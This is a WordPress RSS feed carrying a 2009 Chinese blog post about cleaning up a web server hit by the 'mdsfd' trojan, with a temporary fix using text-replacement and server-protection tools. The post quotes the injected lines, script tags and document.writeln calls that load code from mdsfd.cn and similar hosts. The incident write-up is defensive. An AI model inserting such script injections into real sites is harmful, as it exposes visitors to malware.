<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>木马 &#8211; WL</title>
	<atom:link href="https://wwl3.com/tag/%E6%9C%A8%E9%A9%AC/feed/" rel="self" type="application/rss+xml" />
	<link>https://wwl3.com</link>
	<description>越来越好，越好越来</description>
	<lastBuildDate>Thu, 18 Sep 2014 14:08:59 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.6.2</generator>

<image>
	<url>https://wwl-1316477995.cos.ap-shanghai.myqcloud.com/uploads/2023/01/logo-188x188.jpg</url>
	<title>木马 &#8211; WL</title>
	<link>https://wwl3.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>mdsfd木马临时解决方案</title>
		<link>https://wwl3.com/2009/03/solution-to-mdsfd-trojan/</link>
		
		<dc:creator><![CDATA[王万林]]></dc:creator>
		<pubDate>Tue, 03 Mar 2009 23:07:59 +0000</pubDate>
				<category><![CDATA[Retweeted]]></category>
		<category><![CDATA[木马]]></category>
		<guid isPermaLink="false">http://wwl3.com/2009/03/mdsfd%e6%9c%a8%e9%a9%ac%e4%b8%b4%e6%97%b6%e8%a7%a3%e5%86%b3%e6%96%b9%e6%a1%88/</guid>

					<description><![CDATA[服务器1月份就中马了，项目太紧，人太懒，又无关紧要，就一直没搭理它。小昭的BLOG纠结中，龚浩的BLOG纠结中……唉，没办法，小昭可乐都给我买了，不得不出山了。服务器上网站太多，不知是哪有漏洞，索性弄了一招治标不治本的，暂时顶着先。 症状： 网页被挂马，多了一句&#60;script src=http://mdsfd.cn&#62;&#60;/script&#62;，挂的恶意网站有如下等等：www.51jcjy.com www.rr88rr.cn，所有的JS文件均被添加了 document.writeln ("&#60;script src=\"http://mdsfd.cn\"&#62;&#60;\/script&#62;"); document.writeln ("&#60;script src=\"http://vawh5.cn\"&#62;&#60;\/script&#62;"); document.writeln ("&#60;script src=\"http://lnadk.cn\"&#62;&#60;\/script&#62;"); 个别ASP文件被添加上了 &#60;script src=http://mdsfd.cn&#62;&#60;/script&#62; 删除之后过一段时间文件又被修改。排除ARP病毒，IIS配置文件被改的可能性，具体步骤不做讲解。查找木马的根源，无奈服务器上网站太多，没法子下手。遂先解决当前问题…… 现在采用了以下方案： 首先下载 文本替换专家 2.6，将恶意代码全部清除。 登录www.websafeguard.cn 下载 网站安全卫士-服务器版 配置一下就OK了。详细的设置查帮助文档。 后话 还有一哥们提供了方案，买他们的mdcsoft-ips软件，貌似可以从根源上防止问题。只不过这网站的名字 Mdcsoft（中国）研究院，Mdcsoft（中国）研发集团，够山寨]]></description>
										<content:encoded><![CDATA[<p>服务器1月份就中马了，项目太紧，人太懒，又无关紧要，就一直没搭理它。<a title="小昭的BLOG" href="http://www.zoezhang.com" target="_blank">小昭的BLOG</a>纠结中，<a title="浩行天下" href="http://ghsky.com" target="_blank">龚浩的BLOG</a>纠结中……唉，没办法，<a title="小昭的BLOG" href="http://www.zoezhang.com">小昭</a>可乐都给我买了，不得不出山了。服务器上网站太多，不知是哪有漏洞，索性弄了一招治标不治本的，暂时顶着先。</p>
<h3>症状：</h3>
<p>网页被挂马，多了一句&lt;script src=http://mdsfd.cn&gt;&lt;/script&gt;，挂的恶意网站有如下等等：www.51jcjy.com www.rr88rr.cn，所有的JS文件均被添加了</p>
<pre>document.writeln ("&lt;script src=\"http://mdsfd.cn\"&gt;&lt;\/script&gt;");
document.writeln ("&lt;script src=\"http://vawh5.cn\"&gt;&lt;\/script&gt;");
document.writeln ("&lt;script src=\"http://lnadk.cn\"&gt;&lt;\/script&gt;");</pre>
<p>个别ASP文件被添加上了</p>
<pre>&lt;script src=http://mdsfd.cn&gt;&lt;/script&gt;</pre>
<p>删除之后过一段时间文件又被修改。排除ARP病毒，IIS配置文件被改的可能性，具体步骤不做讲解。查找木马的根源，无奈服务器上网站太多，没法子下手。遂先解决当前问题……</p>
<h3>现在采用了以下方案：</h3>
<ol>
<li>首先下载 <a href="http://www.onlinedown.net/soft/25170.htm" target="_blank">文本替换专家 2.6</a>，将恶意代码全部清除。</li>
<li>登录<a href="http://www.websafeguard.cn">www.websafeguard.cn</a> 下载 <a href="http://www.websafeguard.cn/action/download" target="_blank">网站安全卫士-服务器版</a></li>
<li>配置一下就OK了。详细的设置查<a href="http://www.websafeguard.cn/help/" target="_blank">帮助文档</a>。</li>
</ol>
<h3>后话</h3>
<p>还有一哥们提供了方案，买他们的<a href="http://blog.mdcsoft.cn/archives/200811/196.html" target="_blank">mdcsoft-ips软件</a>，貌似可以从根源上防止问题。只不过<a href="http://blog.mdcsoft.cn/archives/200811/196.html" target="_blank">这网站</a>的名字 Mdcsoft（中国）研究院，Mdcsoft（中国）研发集团，够山寨</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
